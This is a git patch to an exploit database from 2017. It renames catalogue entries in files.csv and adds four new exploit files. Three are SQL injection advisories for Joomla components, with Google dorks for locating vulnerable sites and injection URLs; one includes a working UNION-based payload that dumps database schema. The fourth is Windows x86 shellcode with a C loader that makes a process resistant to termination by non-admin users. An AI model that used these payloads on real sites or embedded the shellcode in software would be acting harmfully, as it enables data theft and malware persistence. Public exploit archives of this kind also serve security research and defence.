From 2d72a9c8b9eb0c99c78001f7f711c7b8f3daba94 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 18 Feb 2017 05:01:17 +0000 Subject: [PATCH] DB: 2017-02-18 4 new exploits Netgear WGR614v9 Wireless Router - GET Request Denial of Service Netgear WGR614v9 Wireless Router - Denial of Service ZABBIX 1.1.2 - Multiple Unspecified Remote Code Execution Vulnerabilities Zabbix 1.1.2 - Multiple Unspecified Remote Code Execution Vulnerabilities ZABBIX 1.1x/1.4.x - File Checksum Request Denial of Service Zabbix 1.1x/1.4.x - File Checksum Request Denial of Service ZABBIX 1.1.4/1.4.2 - 'daemon_start' Privilege Escalation Zabbix 1.1.4/1.4.2 - 'daemon_start' Privilege Escalation Windows x86 - Protect Process Shellcode (229 bytes) Qwerty CMS - 'id' SQL Injection Qwerty CMS - 'id' Parameter SQL Injection Golabi CMS - Remote File Inclusion Golabi CMS 1.0 - Remote File Inclusion blogman 0.45 - Multiple Vulnerabilities EZ-Blog 1b - Delete All Posts / SQL Injection Blogman 0.45 - Multiple Vulnerabilities EZ-Blog beta1 - Delete All Posts / SQL Injection Access2asp - imageLibrary - (ASP) Arbitrary File Upload Access2asp - imageLibrary - Arbitrary File Upload Joomla! Component com_digistore - 'pid' Blind SQL Injection Joomla! Component com_digistore - 'pid' Parameter Blind SQL Injection EZ-Blog Beta2 - (category) SQL Injection EZ-Blog Beta2 - 'category' Parameter SQL Injection Joomla! Component Team Display 1.2.1 - 'filter_category' Parameter SQL Injection Joomla! Component Groovy Gallery 1.0.0 - SQL Injection Joomla! Component WMT Content Timeline 1.0 - 'id' Parameter SQL Injection --- files.csv | 26 +++--- platforms/php/webapps/41379.txt | 17 ++++ platforms/php/webapps/41380.txt | 18 +++++ platforms/php/webapps/41382.txt | 18 +++++ platforms/win_x86/shellcode/41381.c | 121 ++++++++++++++++++++++++++++ 5 files changed, 189 insertions(+), 11 deletions(-) create mode 100755 platforms/php/webapps/41379.txt create mode 100755 platforms/php/webapps/41380.txt create mode 100755 platforms/php/webapps/41382.txt create mode 100755 platforms/win_x86/shellcode/41381.c diff --git a/files.csv b/files.csv index 00b8574af..8975101b6 100644 --- a/files.csv +++ b/files.csv @@ -949,7 +949,7 @@ id,file,description,date,author,platform,type,port 8091,platforms/multiple/dos/8091.html,"Mozilla Firefox 3.0.6 - (BODY onload) Remote Crash",2009-02-23,Skylined,multiple,dos,0 8099,platforms/windows/dos/8099.pl,"Adobe Acrobat Reader - JBIG2 Local Buffer Overflow PoC (2)",2009-02-23,"Guido Landi",windows,dos,0 8102,platforms/windows/dos/8102.txt,"Counter Strike Source ManiAdminPlugin 1.x - Remote Buffer Overflow (PoC)",2009-02-24,M4rt1n,windows,dos,0 -8106,platforms/hardware/dos/8106.txt,"Netgear WGR614v9 Wireless Router - GET Request Denial of Service",2009-02-25,staticrez,hardware,dos,0 +8106,platforms/hardware/dos/8106.txt,"Netgear WGR614v9 Wireless Router - Denial of Service",2009-02-25,staticrez,hardware,dos,0 8125,platforms/hardware/dos/8125.rb,"HTC Touch - vCard over IP Denial of Service",2009-03-02,"Mobile Security Lab",hardware,dos,0 8129,platforms/windows/dos/8129.pl,"Novell eDirectory iMonitor - 'Accept-Language' Request Buffer Overflow (PoC)",2009-03-02,"Praveen Darshanam",windows,dos,0 8135,platforms/windows/dos/8135.pl,"Media Commands - '.m3u' / '.m3l' / '.TXT' / '.LRC' Local Heap Overflow (PoC)",2009-03-02,Hakxer,windows,dos,0 @@ -3649,7 +3649,7 @@ id,file,description,date,author,platform,type,port 28683,platforms/linux/dos/28683.txt,"HylaFAX+ 5.2.4 > 5.5.3 - Buffer Overflow",2013-10-02,"Dennis Jenkins",linux,dos,0 28735,platforms/windows/dos/28735.pl,"MailEnable 2.x - SMTP NTLM Authentication - Multiple Vulnerabilities",2006-11-29,mu-b,windows,dos,0 28739,platforms/hardware/dos/28739.pl,"Motorola SB4200 - Remote Denial of Service",2006-10-03,"Dave Gil",hardware,dos,0 -28775,platforms/linux/dos/28775.pl,"ZABBIX 1.1.2 - Multiple Unspecified Remote Code Execution Vulnerabilities",2006-10-09,"Max Vozeler",linux,dos,0 +28775,platforms/linux/dos/28775.pl,"Zabbix 1.1.2 - Multiple Unspecified Remote Code Execution Vulnerabilities",2006-10-09,"Max Vozeler",linux,dos,0 28785,platforms/windows/dos/28785.c,"Google Earth 4.0.2091 (Beta) - '.KML'/'.KMZ' Buffer Overflow",2006-09-14,JAAScois,windows,dos,0 30208,platforms/windows/dos/30208.txt,"IcoFX 2.5.0.0 - '.ico' Buffer Overflow",2013-12-11,"Core Security",windows,dos,0 28811,platforms/osx/dos/28811.txt,"Apple Motion 5.0.7 - Integer Overflow",2013-10-08,"Jean Pascal Pereira",osx,dos,0 @@ -3962,7 +3962,7 @@ id,file,description,date,author,platform,type,port 31696,platforms/windows/dos/31696.txt,"Computer Associates eTrust Secure Content Manager 8.0 - 'eCSqdmn' Remote Denial of Service",2008-04-22,"Luigi Auriemma",windows,dos,0 31461,platforms/windows/dos/31461.txt,"Publish-It 3.6d - Buffer Overflow",2014-02-06,"Core Security",windows,dos,0 31399,platforms/windows/dos/31399.txt,"McAfee Framework ePolicy 3.x - Orchestrator '_naimcomn_Log' Remote Format String",2008-03-12,"Luigi Auriemma",windows,dos,0 -31403,platforms/unix/dos/31403.txt,"ZABBIX 1.1x/1.4.x - File Checksum Request Denial of Service",2008-03-13,"Milen Rangelov",unix,dos,0 +31403,platforms/unix/dos/31403.txt,"Zabbix 1.1x/1.4.x - File Checksum Request Denial of Service",2008-03-13,"Milen Rangelov",unix,dos,0 31429,platforms/multiple/dos/31429.py,"VideoLAN VLC Media Player 2.1.2 - '.asf' Crash (PoC)",2014-02-05,Saif,multiple,dos,0 31440,platforms/linux/dos/31440.txt,"Asterisk 1.4.x - RTP Codec Payload Handling Multiple Buffer Overflow Vulnerabilities",2008-03-18,"Mu Security research",linux,dos,0 31444,platforms/linux/dos/31444.txt,"MySQL 5.1.13 - INFORMATION_SCHEMA Remote Denial of Service",2007-12-05,"Masaaki HIROSE",linux,dos,0 @@ -8172,7 +8172,7 @@ id,file,description,date,author,platform,type,port 30780,platforms/linux/local/30780.txt,"ISPmanager 4.2.15 - Responder Privilege Escalation",2007-11-20,"Andrew Christensen",linux,local,0 30788,platforms/windows/local/30788.rb,"IcoFX - Stack Buffer Overflow (Metasploit)",2014-01-07,Metasploit,windows,local,0 30789,platforms/windows/local/30789.rb,"IBM Forms Viewer - Unicode Buffer Overflow (Metasploit)",2014-01-07,Metasploit,windows,local,0 -30839,platforms/linux/local/30839.c,"ZABBIX 1.1.4/1.4.2 - 'daemon_start' Privilege Escalation",2007-12-03,"Bas van Schaik",linux,local,0 +30839,platforms/linux/local/30839.c,"Zabbix 1.1.4/1.4.2 - 'daemon_start' Privilege Escalation",2007-12-03,"Bas van Schaik",linux,local,0 30999,platforms/windows/local/30999.txt,"Creative Ensoniq PCI ES1371 WDM Driver 5.1.3612 - Privilege Escalation",2008-01-07,"Ruben Santamarta",windows,local,0 31036,platforms/windows/local/31036.txt,"CORE FORCE Firewall 0.95.167 and Registry Modules - Multiple Local Kernel Buffer Overflow Vulnerabilities",2008-01-17,"Sebastian Gottschalk",windows,local,0 31090,platforms/windows/local/31090.txt,"MuPDF 1.3 - Stack Based Buffer Overflow in xps_parse_color()",2014-01-20,"Jean-Jamil Khalife",windows,local,0 @@ -15897,6 +15897,7 @@ id,file,description,date,author,platform,type,port 41220,platforms/linux/shellcode/41220.c,"Linux - Multi/Dual mode Reverse Shell Shellcode (129 bytes)",2017-02-02,odzhancode,linux,shellcode,0 41282,platforms/lin_x86/shellcode/41282.nasm,"Linux/x86 - Reverse TCP Alphanumeric Staged Shellcode (103 bytes)",2017-02-08,"Snir Levi",lin_x86,shellcode,0 41375,platforms/linux/shellcode/41375.c,"Linux - Dual/Multi mode Bind Shell Shellcode (156 bytes)",2017-02-16,odzhancode,linux,shellcode,0 +41381,platforms/win_x86/shellcode/41381.c,"Windows x86 - Protect Process Shellcode (229 bytes)",2017-02-17,"Ege Balci",win_x86,shellcode,0 6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0 44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0 47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0 @@ -20786,13 +20787,13 @@ id,file,description,date,author,platform,type,port 8098,platforms/php/webapps/8098.txt,"taifajobs 1.0 - 'jobid' Parameter SQL Injection",2009-02-23,K-159,php,webapps,0 8100,platforms/php/webapps/8100.pl,"MDPro Module My_eGallery - 'pid' SQL Injection",2009-02-23,StAkeR,php,webapps,0 8101,platforms/php/webapps/8101.txt,"XGuestBook 2.0 - Authentication Bypass",2009-02-24,Fireshot,php,webapps,0 -8104,platforms/php/webapps/8104.txt,"Qwerty CMS - 'id' SQL Injection",2009-02-24,b3,php,webapps,0 +8104,platforms/php/webapps/8104.txt,"Qwerty CMS - 'id' Parameter SQL Injection",2009-02-24,b3,php,webapps,0 8105,platforms/php/webapps/8105.txt,"pPIM 1.0 - Multiple Vulnerabilities",2009-02-25,"Justin Keane",php,webapps,0 8107,platforms/asp/webapps/8107.txt,"PenPal 2.0 - Authentication Bypass",2009-02-25,ByALBAYX,asp,webapps,0 8109,platforms/asp/webapps/8109.txt,"SkyPortal Classifieds System 0.12 - Contents Change",2009-02-25,ByALBAYX,asp,webapps,0 8110,platforms/asp/webapps/8110.txt,"SkyPortal Picture Manager 0.11 - Contents Change",2009-02-25,ByALBAYX,asp,webapps,0 8111,platforms/asp/webapps/8111.txt,"SkyPortal WebLinks 0.12 - Contents Change",2009-02-25,ByALBAYX,asp,webapps,0 -8112,platforms/php/webapps/8112.txt,"Golabi CMS - Remote File Inclusion",2009-02-26,CrazyAngel,php,webapps,0 +8112,platforms/php/webapps/8112.txt,"Golabi CMS 1.0 - Remote File Inclusion",2009-02-26,CrazyAngel,php,webapps,0 8113,platforms/asp/webapps/8113.txt,"DesignerfreeSolutions NewsLetter Manager Pro - Authentication Bypass",2009-02-26,ByALBAYX,asp,webapps,0 8114,platforms/php/webapps/8114.txt,"Coppermine Photo Gallery 1.4.20 - (BBCode IMG) Privilege Escalation",2009-02-26,StAkeR,php,webapps,0 8115,platforms/php/webapps/8115.pl,"Coppermine Photo Gallery 1.4.20 - (IMG) Privilege Escalation",2009-02-26,Inphex,php,webapps,0 @@ -20800,13 +20801,13 @@ id,file,description,date,author,platform,type,port 8120,platforms/asp/webapps/8120.txt,"SkyPortal Downloads Manager 1.1 - Remote Contents Change",2009-02-27,ByALBAYX,asp,webapps,0 8123,platforms/php/webapps/8123.txt,"irokez blog 0.7.3.2 - Cross-Site Scripting / Remote File Inclusion / Blind SQL Injection",2009-02-27,Corwin,php,webapps,0 8124,platforms/php/webapps/8124.txt,"Demium CMS 0.2.1b - Multiple Vulnerabilities",2009-02-27,Osirys,php,webapps,0 -8127,platforms/php/webapps/8127.txt,"blogman 0.45 - Multiple Vulnerabilities",2009-03-02,"Salvatore Fresta",php,webapps,0 -8128,platforms/php/webapps/8128.txt,"EZ-Blog 1b - Delete All Posts / SQL Injection",2009-03-02,"Salvatore Fresta",php,webapps,0 +8127,platforms/php/webapps/8127.txt,"Blogman 0.45 - Multiple Vulnerabilities",2009-03-02,"Salvatore Fresta",php,webapps,0 +8128,platforms/php/webapps/8128.txt,"EZ-Blog beta1 - Delete All Posts / SQL Injection",2009-03-02,"Salvatore Fresta",php,webapps,0 8130,platforms/asp/webapps/8130.txt,"Document Library 1.0.1 - Arbitrary Change Admin",2009-03-02,ByALBAYX,asp,webapps,0 8131,platforms/asp/webapps/8131.txt,"Digital Interchange Calendar 5.7.13 - Contents Change",2009-03-02,ByALBAYX,asp,webapps,0 -8132,platforms/asp/webapps/8132.txt,"Access2asp - imageLibrary - (ASP) Arbitrary File Upload",2009-03-02,mr.al7rbi,asp,webapps,0 +8132,platforms/asp/webapps/8132.txt,"Access2asp - imageLibrary - Arbitrary File Upload",2009-03-02,mr.al7rbi,asp,webapps,0 8133,platforms/php/webapps/8133.txt,"Graugon PHP Article Publisher 1.0 - SQL Injection / Cookie Handling",2009-03-02,x0r,php,webapps,0 -8134,platforms/php/webapps/8134.php,"Joomla! Component com_digistore - 'pid' Blind SQL Injection",2009-03-02,InjEctOr5,php,webapps,0 +8134,platforms/php/webapps/8134.php,"Joomla! Component com_digistore - 'pid' Parameter Blind SQL Injection",2009-03-02,InjEctOr5,php,webapps,0 8136,platforms/php/webapps/8136.txt,"Joomla! / Mambo Component eXtplorer - Code Execution",2009-03-02,"Juan Galiana Lara",php,webapps,0 8139,platforms/php/webapps/8139.txt,"ritsblog 0.4.2 - Authentication Bypass / Cross-Site Scripting",2009-03-02,"Salvatore Fresta",php,webapps,0 8140,platforms/php/webapps/8140.txt,"Zabbix 1.6.2 Frontend - Multiple Vulnerabilities",2009-03-03,USH,php,webapps,0 @@ -21010,7 +21011,7 @@ id,file,description,date,author,platform,type,port 8543,platforms/php/webapps/8543.php,"LightBlog 9.9.2 - 'register.php' Remote Code Execution",2009-04-27,EgiX,php,webapps,0 8545,platforms/php/webapps/8545.txt,"Dew-NewPHPLinks 2.0 - Local File Inclusion / Cross-Site Scripting",2009-04-27,d3v1l,php,webapps,0 8546,platforms/php/webapps/8546.txt,"Thickbox Gallery 2 - 'index.php' Local File Inclusion",2009-04-27,SirGod,php,webapps,0 -8547,platforms/php/webapps/8547.txt,"EZ-Blog Beta2 - (category) SQL Injection",2009-04-27,YEnH4ckEr,php,webapps,0 +8547,platforms/php/webapps/8547.txt,"EZ-Blog Beta2 - 'category' Parameter SQL Injection",2009-04-27,YEnH4ckEr,php,webapps,0 8548,platforms/php/webapps/8548.txt,"ECShop 2.5.0 - (order_sn) SQL Injection",2009-04-27,Securitylab.ir,php,webapps,0 8549,platforms/php/webapps/8549.txt,"Flatchat 3.0 - 'pmscript.php with' Local File Inclusion",2009-04-27,SirGod,php,webapps,0 8550,platforms/php/webapps/8550.txt,"Teraway LinkTracker 1.0 - Insecure Cookie Handling",2009-04-27,"ThE g0bL!N",php,webapps,0 @@ -37296,3 +37297,6 @@ id,file,description,date,author,platform,type,port 41376,platforms/php/webapps/41376.txt,"WordPress Plugin Corner Ad 1.0.7 - Cross-Site Scripting",2017-02-16,"Atik Rahman",php,webapps,0 41377,platforms/php/webapps/41377.sh,"dotCMS 3.6.1 - Blind Boolean SQL Injection",2017-02-16,"Ben Nott",php,webapps,80 41378,platforms/php/webapps/41378.txt,"Joomla! Component JEmbedAll 1.4 - SQL Injection",2017-02-16,"Ihsan Sencan",php,webapps,0 +41379,platforms/php/webapps/41379.txt,"Joomla! Component Team Display 1.2.1 - 'filter_category' Parameter SQL Injection",2017-02-17,"Ihsan Sencan",php,webapps,0 +41380,platforms/php/webapps/41380.txt,"Joomla! Component Groovy Gallery 1.0.0 - SQL Injection",2017-02-17,"Ihsan Sencan",php,webapps,0 +41382,platforms/php/webapps/41382.txt,"Joomla! Component WMT Content Timeline 1.0 - 'id' Parameter SQL Injection",2017-02-17,"Ihsan Sencan",php,webapps,0 diff --git a/platforms/php/webapps/41379.txt b/platforms/php/webapps/41379.txt new file mode 100755 index 000000000..cb685ede4 --- /dev/null +++ b/platforms/php/webapps/41379.txt @@ -0,0 +1,17 @@ +# # # # # +# Exploit Title: Joomla! Component Team Display v1.2.1 - SQL Injection +# Google Dork: inurl:index.php?option=com_teamdisplay +# Date: 17.02.2017 +# Vendor Homepage: http://addonstreet.com/ +# Software Buy: https://extensions.joomla.org/extensions/extension/vertical-markets/thematic-directory/team-display/ +# Demo: http://addonstreet.com/demo/teamdisplay/ +# Version: 1.2.1 +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/index.php?option=com_teamdisplay&view=members&filter_category=[SQL] +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41380.txt b/platforms/php/webapps/41380.txt new file mode 100755 index 000000000..8df22ecd4 --- /dev/null +++ b/platforms/php/webapps/41380.txt @@ -0,0 +1,18 @@ +# # # # # +# Exploit Title: Joomla! Component Groovy Gallery v1.0.0 - SQL Injection +# Google Dork: inurl:index.php?option=com_groovygallery +# Date: 17.02.2017 +# Vendor Homepage: http://addonstreet.com/ +# Software Buy: https://extensions.joomla.org/extensions/extension/photos-a-images/galleries/groovy-gallery/ +# Demo: http://addonstreet.com/products/groovy-gallery +# Version: 1.0.0 +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/index.php?option=com_groovygallery&view=images&filter_category=[SQL] +# http://localhost/[PATH]/index.php?option=com_groovygallery&view=images&groovy_category=[SQL] +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41382.txt b/platforms/php/webapps/41382.txt new file mode 100755 index 000000000..b13356c2c --- /dev/null +++ b/platforms/php/webapps/41382.txt @@ -0,0 +1,18 @@ +# # # # # +# Exploit Title: Joomla! Component WMT Content Timeline v1.0 - SQL Injection +# Google Dork: inurl:index.php?option=com_wmt_content_timeline +# Date: 17.02.2017 +# Vendor Homepage: http://devecostudio.com +# Software Buy: https://extensions.joomla.org/extensions/extension/news-display/articles-display/wmt-content-timeline/ +# Demo: http://joomla.devecostudio.com/9-wmt-content-timeline-joomla-module.html +# Version: 1.0 +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/index.php?option=com_wmt_content_timeline&task=returnArticle&id=[SQL] +# -66666+/*!50000union*/+select+1,2,3,4,5,6,7,8,9,10,0x496873616e2053656e63616e203c62723e207777772e696873616e2e6e6574,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),13,14,15--+- +# # # # # \ No newline at end of file diff --git a/platforms/win_x86/shellcode/41381.c b/platforms/win_x86/shellcode/41381.c new file mode 100755 index 000000000..cb879c320 --- /dev/null +++ b/platforms/win_x86/shellcode/41381.c @@ -0,0 +1,121 @@ +/* + +# Win32 - Protect Process Shellcode +# Date: [17.02.2017] +# Author: [Ege Balcı] +# Tested on: [Win 7/8/8.1/10] + +This shellcode sets the SE_DACL_PROTECTED flag inside security descriptor structure, +this will prevent the process being terminated by non administrative users. + +----------------------------------------------------------------- + +[BITS 32] +[ORG 0] + +; EAX-> Return Values +; EBX-> Process Handle +; EBP-> API Block +; ESI-> Saved ESP + + pushad ; Save all registers to stack + pushfd ; Save all flags to stack + + push esp ; Push the current esp value + pop esi ; Save the current esp value to ecx + + cld ; Clear direction flags + call Start + +%include "API-BLOCK.asm"; Stephen Fewer's hash API from metasploit project + +Start: + pop ebp ; Pop the address of SFHA + + push 0x62C64749 ; hash(kernel32.dll, GetCurrentProcessId()) + call ebp ; GetCurrentProcessId() + + push eax ; Process ID + push 0x00000000 ; FALSE + push 0x1F0FFF ; PROCESS_ALL_ACCESS + push 0x50B695EE ; hash(kernel32.dll, OpenProcess) + call ebp ; OpenProcess(PROCESS_ALL_ACCESS,FALSE,ECX) + mov ebx, eax ; Move process handle to ebx + + + push 0x00000000 ; 0,0 + push 0x32336970 ; pi32 + push 0x61766461 ; adva + push esp ; Push the address of "advapi32" string + push 0x0726774C ; hash(kernel32.dll, LoadLibraryA) + call ebp ; LoadLibraryA("advapi32") + + push 0x00503a44 ; "D:P" + sub esp,4 ; Push the address of "D:P" string to stack + + push 0x00000000 ; FALSE + lea eax, [esp+4] ; Load the address of 4 byte buffer to EAX + push eax ; Push the 4 byte buffer address + push 0x00000001 ; SDDL_REVISION_1 + lea eax, [esp+16] ; Load the address of "D:P" string to EAX + push eax ; Push the EAX value + push 0xDA6F639A ; hash(advapi32.dll, ConvertStringSecurityDescriptorToSecurityDescriptor) + call ebp ; ConvertStringSecurityDescriptorToSecurityDescriptor("D:P",SDDL_REVISION_1,FALSE) + + push 0x00000004 ; DACL_SECURITY_INFORMATION + push ebx ; Process Handle + push 0xD63AF8DB ; hash(kernel32.dll, SetKernelObjectSecurity) + call ebp ; SetKernelObjectSecurity(ProcessHandle,DACL_SECURITY_INFORMATION,SecurityDescriptor) + + mov esp,esi ; Restore the address of esp + popad ; Popback all registers + popfd ; Popback all flags + ret ; Return + + +*/ + + +//>Special thanks to Yusuf Arslan Polat ;D +#include +#include + +unsigned char Shellcode[] = { + 0x60, 0x9c, 0x54, 0x5e, 0xfc, 0xe8, 0x82, 0x00, 0x00, 0x00, 0x60, 0x89, + 0xe5, 0x31, 0xc0, 0x64, 0x8b, 0x50, 0x30, 0x8b, 0x52, 0x0c, 0x8b, 0x52, + 0x14, 0x8b, 0x72, 0x28, 0x0f, 0xb7, 0x4a, 0x26, 0x31, 0xff, 0xac, 0x3c, + 0x61, 0x7c, 0x02, 0x2c, 0x20, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0xe2, 0xf2, + 0x52, 0x57, 0x8b, 0x52, 0x10, 0x8b, 0x4a, 0x3c, 0x8b, 0x4c, 0x11, 0x78, + 0xe3, 0x48, 0x01, 0xd1, 0x51, 0x8b, 0x59, 0x20, 0x01, 0xd3, 0x8b, 0x49, + 0x18, 0xe3, 0x3a, 0x49, 0x8b, 0x34, 0x8b, 0x01, 0xd6, 0x31, 0xff, 0xac, + 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0x38, 0xe0, 0x75, 0xf6, 0x03, 0x7d, 0xf8, + 0x3b, 0x7d, 0x24, 0x75, 0xe4, 0x58, 0x8b, 0x58, 0x24, 0x01, 0xd3, 0x66, + 0x8b, 0x0c, 0x4b, 0x8b, 0x58, 0x1c, 0x01, 0xd3, 0x8b, 0x04, 0x8b, 0x01, + 0xd0, 0x89, 0x44, 0x24, 0x24, 0x5b, 0x5b, 0x61, 0x59, 0x5a, 0x51, 0xff, + 0xe0, 0x5f, 0x5f, 0x5a, 0x8b, 0x12, 0xeb, 0x8d, 0x5d, 0x68, 0x49, 0x47, + 0xc6, 0x62, 0xff, 0xd5, 0x50, 0x6a, 0x00, 0x68, 0xff, 0x0f, 0x1f, 0x00, + 0x68, 0xee, 0x95, 0xb6, 0x50, 0xff, 0xd5, 0x89, 0xc3, 0x6a, 0x00, 0x68, + 0x70, 0x69, 0x33, 0x32, 0x68, 0x61, 0x64, 0x76, 0x61, 0x54, 0x68, 0x4c, + 0x77, 0x26, 0x07, 0xff, 0xd5, 0x68, 0x44, 0x3a, 0x50, 0x00, 0x83, 0xec, + 0x04, 0x6a, 0x00, 0x8d, 0x44, 0x24, 0x04, 0x50, 0x6a, 0x01, 0x8d, 0x44, + 0x24, 0x10, 0x50, 0x68, 0x9a, 0x63, 0x6f, 0xda, 0xff, 0xd5, 0x6a, 0x04, + 0x53, 0x68, 0xdb, 0xf8, 0x3a, 0xd6, 0xff, 0xd5, 0x89, 0xf4, 0x61, 0x9d, + 0xc3 +}; + + + +int main(int argc, char const *argv[]) +{ + char* BUFFER = (char*)VirtualAlloc(NULL, sizeof(Shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE); + memcpy(BUFFER, Shellcode, sizeof(Shellcode)); + (*(void(*)())BUFFER)(); + + printf("This process is protected !"); + getchar(); + + return 0; +} + + +